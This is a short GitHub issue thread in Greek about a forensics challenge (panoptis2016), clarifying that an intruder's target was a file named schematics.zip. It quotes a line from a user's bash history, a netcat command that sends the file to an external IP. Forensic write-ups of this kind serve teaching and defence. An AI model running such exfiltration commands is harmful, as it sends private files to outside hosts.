### ISSUE TITLE
Στόχος της επίθεσης

### ISSUE THREAD

**Issue by Polichronucci** [eellak/panoptis2016#12]
Ξέρω πως το αναφέρω πολύ αργά αλλά ο στόχος της επίθεσης δεν ήταν τα αρχεία του janus. Το janus ήταν απλά ένα εργαλείο το οποίο "'έσπασε" ο επιτιθέμενος για να έρθει σε ασφαλή επικοινωνία με τον th.nikolaidis. Ο στόχος ήταν το αρχείο schematics.zip όπου αρχικά στέλνει από το μηχάνημα "chaos" στο "it" και στην συνέχεια σε εξωτερική IP, όλο αυτό φαίνεται από το .bash_history του χρήστη th.nikolaidis στο "it".

nc 516.333.109.88 443 < /home/th.nikolaidis/.tmp/schematics.zip

**Comment by ghost** [comment]
Thanks, προστέθηκε η διευκρίνιση. Η όλη διαδικασία φαίνεται στο Flag Find the Insider, αλλά πλέον διευκρινίζεται και στο section ΑΠΟΤΙΜΗΣΗ. (issue closed)
